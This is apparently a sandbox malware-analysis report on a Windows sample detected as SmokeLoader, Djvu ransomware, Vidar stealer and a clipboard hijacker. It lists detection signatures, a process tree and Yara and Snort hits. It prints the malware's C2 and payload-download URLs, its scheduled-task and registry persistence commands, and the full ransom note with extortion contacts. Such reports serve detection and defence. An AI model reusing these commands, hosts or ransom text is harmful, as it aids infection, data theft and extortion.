Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1447536
MD5:a25ac46e5bea920465d1838177782e5b
SHA1:7abf711cac6ff5f35fc0b3f435d6ec5d9b0a0298
SHA256:4f367a58544f96f8d0dd19d323acf0db1437d2cd8ef96324a37ea7be20cabf36
Tags:exe
Infos:

Detection

Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected Babuk Ransomware
Yara detected Clipboard Hijacker
Yara detected Djvu Ransomware
Yara detected Powershell download and execute
Yara detected SmokeLoader
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies existing user documents (likely ransomware behavior)
Opens network shares
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Writes a notice file (html or txt) to demand a ransom
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 4304 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A25AC46E5BEA920465D1838177782E5B)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • cmd.exe (PID: 5688 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C002.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 5592 cmdline: reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • E609.exe (PID: 6956 cmdline: C:\Users\user\AppData\Local\Temp\E609.exe MD5: 3EEDC2AE680453B8CA3B23FD15F529A7)
        • E609.exe (PID: 7048 cmdline: C:\Users\user\AppData\Local\Temp\E609.exe MD5: 3EEDC2AE680453B8CA3B23FD15F529A7)
          • icacls.exe (PID: 4008 cmdline: icacls "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: 2E49585E4E08565F52090B144062F97E)
          • E609.exe (PID: 2844 cmdline: "C:\Users\user\AppData\Local\Temp\E609.exe" --Admin IsNotAutoStart IsNotTask MD5: 3EEDC2AE680453B8CA3B23FD15F529A7)
            • E609.exe (PID: 2764 cmdline: "C:\Users\user\AppData\Local\Temp\E609.exe" --Admin IsNotAutoStart IsNotTask MD5: 3EEDC2AE680453B8CA3B23FD15F529A7)
              • build2.exe (PID: 7144 cmdline: "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe" MD5: 4F54B83888A62CDD3584C0A0FEE970D8)
                • build2.exe (PID: 5316 cmdline: "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe" MD5: 4F54B83888A62CDD3584C0A0FEE970D8)
                  • cmd.exe (PID: 1340 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGIJEBGDAFHI" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                    • conhost.exe (PID: 3120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • build3.exe (PID: 4284 cmdline: "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe" MD5: 41B883A061C95E9B9CB17D4CA50DE770)
                • build3.exe (PID: 1820 cmdline: "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe" MD5: 41B883A061C95E9B9CB17D4CA50DE770)
                  • schtasks.exe (PID: 3384 cmdline: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
                    • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • E609.exe (PID: 5688 cmdline: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe --Task MD5: 3EEDC2AE680453B8CA3B23FD15F529A7)
        • E609.exe (PID: 5436 cmdline: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe --Task MD5: 3EEDC2AE680453B8CA3B23FD15F529A7)
      • cmd.exe (PID: 6956 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C01.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 5284 cmdline: reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • E609.exe (PID: 6008 cmdline: "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart MD5: 3EEDC2AE680453B8CA3B23FD15F529A7)
        • E609.exe (PID: 3128 cmdline: "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart MD5: 3EEDC2AE680453B8CA3B23FD15F529A7)
      • E609.exe (PID: 916 cmdline: "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart MD5: 3EEDC2AE680453B8CA3B23FD15F529A7)
        • E609.exe (PID: 4956 cmdline: "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart MD5: 3EEDC2AE680453B8CA3B23FD15F529A7)
      • WerFault.exe (PID: 7048 cmdline: C:\Windows\system32\WerFault.exe -u -p 2580 -s 10876 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • rujtcgu (PID: 2132 cmdline: C:\Users\user\AppData\Roaming\rujtcgu MD5: A25AC46E5BEA920465D1838177782E5B)
  • mstsca.exe (PID: 3652 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)
    • mstsca.exe (PID: 3720 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)
      • schtasks.exe (PID: 5356 cmdline: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 1984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • rujtcgu (PID: 3900 cmdline: C:\Users\user\AppData\Roaming\rujtcgu MD5: A25AC46E5BEA920465D1838177782E5B)
  • explorer.exe (PID: 6216 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
BabukBabuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
NameDescriptionAttributionBlogpost URLsLink
STOP, DjvuSTOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stop
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "4b617f18efba315ca20e874e36c04827", "Version": "9.8"}
{"Version": 2022, "C2 list": ["http://trad-einmyus.com/index.php", "http://tradein-myus.com/index.php", "http://trade-inmyus.com/index.php"]}
{"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://cajgtus.com/files/1/build3.exe"], "C2 url": "http://cajgtus.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0871PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA8xYa6j6LzNJB2kuwO9Xc\\\\nSWMnTH6B2dX\\/XX8jCZc7kUlSg50HcwN2bYxLmKAwhfJZPFIYAufx4nMDKTEKIK5\\/\\\\n4RtQWlcufmpr7vcIJMnyyxwwyni9YfRUJR5VIIhfKzQE3gIQZ29b3M6dqzQeQ+oX\\\\nxHUQPadvTz\\/oYY7IbyFLZsHCxHKG2G2v4Yg4SX0nqMuvuzdAT+fLgmZd1ENiuf4U\\\\nWhF6Td3TAs0EkPT6MrxIXCKIQS5LAXEBcAlxRfv4QU03yP7NBxk4\\/gW6l4kV3RuO\\\\nbgqMAuPe3AkrIuOm1zi5FGsr7e8Y8KYE\\/RfQnJe+eOsmXlnhEpJGk1OLIrGxPETz\\\\nUQIDAQAB\\\\n-----END PUBLIC KEY-----"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security
    SourceRuleDescriptionAuthorStrings
    00000012.00000002.2109889853.0000000002D90000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
        00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
        • 0x27a3:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
        00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Clipbanker_787b130bunknownunknown
        • 0x249a:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00
        • 0x2527:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A
        • 0x2527:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A
        • 0x284d:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ...
        • 0x28d5:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
        00000020.00000002.2341456493.00000000008DC000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x772c:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        Click to see the 90 entries
        SourceRuleDescriptionAuthorStrings
        32.2.mstsca.exe.8a15a0.1.raw.unpackJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
          32.2.mstsca.exe.8a15a0.1.raw.unpackWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
          • 0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
          32.2.mstsca.exe.8a15a0.1.raw.unpackWindows_Trojan_Clipbanker_787b130bunknownunknown
          • 0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00
          • 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A
          • 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A
          • 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ...
          • 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
          35.2.mstsca.exe.400000.0.raw.unpackJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
            35.2.mstsca.exe.400000.0.raw.unpackWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
            • 0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
            Click to see the 85 entries

            System Summary

            barindex
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\E609.exe, ProcessId: 7048, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper
            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\rujtcgu, CommandLine: C:\Users\user\AppData\Roaming\rujtcgu, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\rujtcgu, NewProcessName: C:\Users\user\AppData\Roaming\rujtcgu, OriginalFileName: C:\Users\user\AppData\Roaming\rujtcgu, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\rujtcgu, ProcessId: 2132, ProcessName: rujtcgu
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe", CommandLine: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe" , ParentImage: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe, ParentProcessId: 1820, ParentProcessName: build3.exe, ProcessCommandLine: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe", ProcessId: 3384, ProcessName: schtasks.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe", CommandLine: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe" , ParentImage: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe, ParentProcessId: 1820, ParentProcessName: build3.exe, ProcessCommandLine: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe", ProcessId: 3384, ProcessName: schtasks.exe
            Timestamp:05/25/24-21:29:44.396945
            SID:2036335
            Source Port:80
            Destination Port:49757
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:44.401863
            SID:2036335
            Source Port:80
            Destination Port:49758
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:30:00.599943
            SID:2039103
            Source Port:49784
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:30:01.497363
            SID:2039103
            Source Port:49787
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:57.239689
            SID:2039103
            Source Port:49778
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:40.316894
            SID:2039103
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:45.087893
            SID:2039103
            Source Port:49761
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:44.285365
            SID:2036333
            Source Port:49760
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:38.780399
            SID:2039103
            Source Port:49749
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:44.285365
            SID:2020826
            Source Port:49760
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:46.731629
            SID:2039103
            Source Port:49764
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:51.704930
            SID:2039103
            Source Port:49770
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:45.888233
            SID:2039103
            Source Port:49763
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:50.854256
            SID:2039103
            Source Port:49769
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:23.967892
            SID:2039103
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:37.997029
            SID:2039103
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:26.439461
            SID:2039103
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:28.810994
            SID:2039103
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:47.693105
            SID:2039103
            Source Port:49766
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:55.404520
            SID:2039103
            Source Port:49775
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:25.627974
            SID:2039103
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:30:14.919115
            SID:2039103
            Source Port:49797
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:30:22.918329
            SID:2039103
            Source Port:49802
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:54.574933
            SID:2039103
            Source Port:49774
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:30:25.031123
            SID:2039103
            Source Port:49805
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:41.205625
            SID:2036333
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:41.205625
            SID:2020826
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:59.082949
            SID:2039103
            Source Port:49782
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:36.317305
            SID:2039103
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:28.037194
            SID:2039103
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:44.284933
            SID:2039103
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:43.458282
            SID:2833438
            Source Port:49757
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:56.417456
            SID:2039103
            Source Port:49777
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:23.042406
            SID:2039103
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
